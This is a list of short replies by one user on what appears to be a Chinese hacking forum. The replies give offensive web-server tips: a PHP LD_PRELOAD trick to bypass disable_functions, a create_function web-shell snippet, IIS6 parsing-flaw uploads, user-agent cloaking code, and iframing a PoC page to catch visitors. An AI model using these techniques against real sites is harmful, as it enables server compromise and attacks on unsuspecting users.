最新回复

  • 帖子作者
    回复
  • #848164

    谢谢各位表哥,问题已经自行解决。header里面多加了一行:Accept-Encoding: gzip, deflate, br结果导致返回结果没有按照json去解析,去掉已经可以正常使用。

  • #826504

    mysql不能导出,正常是mysql被降权了。

  • #826510

    查找主站的物理路径,查找上传文件的物理路径,尝试上传到主站目录。

  • #825711

    你需要先找找网站是否有可执行脚本的目录,有的话,配合iis6的解析漏洞,move或者copy一下

  • #825717

    我就想知道,为什么论坛首页看见的是sihu.com???

  • #825716

    5块钱引发的一场血案,过程很详细,找朋友借一台装了msf,也是666的很。

  • #817191

    百度网盘还有博客都找了,没有发现第18课的内容{:6_441:}

  • #810663

    <?phpputenv("LD_PRELOAD=/var/www/hack.so");mail("a@localhost","","","","");?>核心代码不就这样么。。google:利用环境变量LD_PRELOAD来绕过php disable_function执行系统命令好多年前就有了,lz只是方便了执行命令。

  • #804528

    现在很少直接墙的你域名了,墙了你的域名,你国内找个服务器转发一下还是能开的,现在最恶心的是直接封网站的解析ip。。。

  • #795956

    func=phpinfo<?php$s = create_function('', $_REQUEST);$s();?>func=create_function('', $_REQUEST)测试貌似不行

  • #794036

    你可以看看这个文章系列:http://www.freebuf.com/articles/web/162152.html

  • #794033

    把style.css里面的body{display: none;}这句去掉。

  • #792770

    回复 2# ihoney 后来测试中遇见有10位的mymd5可以爆破出来,但是不是10位的话,就不成功,很纳闷哪里出问题

  • #794031

    回复 5# ihoney 密匙爆破不出来,就测试其他漏洞,任意文件下载,下载confg.php配置文件,直接从里面找密匙,其他没什么好的办法,不知道我们不会利用还是什么问题,思路其实很好的

  • #791311

    <?phpif(strpos(strtolower($_SERVER),'360spider')!==false){ echo 'xxxxxx';}?>针对USER_AGENT劫持而已。

  • #791324

    回复 22# doctor66 你为什么非要纠结到这个404页面呢?问题不在这个地方,服务器是iis的话,看看网站目录里面的web.config,apache的找.htaccess,你没发现你这个是伪静态劫持吗?看图:apache找这种:RewriteRule ^(.+)index/.html$ /xxxxx.php?$1 web.config找这种:<rewrite> <rules> <rule name="test"> <match url="^(.+)index\.html" /> <action type="Rewrite" url="/xxxxxx.php?{R:1}" /> </rule> </ ...

  • #787873

    回复 2# ConTrol 最不缺的就是点击的人,稍微有点流量的站,iframe一下poc页面,分分钟一大把大兄弟。

  • #788073

    回复 11# Jumbo 是啊,引用的就是这个快捷登录的分析。活久见,碰见本人了{:6_434:}

  • #788074

    回复 15# redn3ck 我只是引用第一句前言,代码没有好吗,表乱讲,

  • #788075

    回复 14# EazyLov3 已重新编辑加入了分析文章的地址。

Top ↑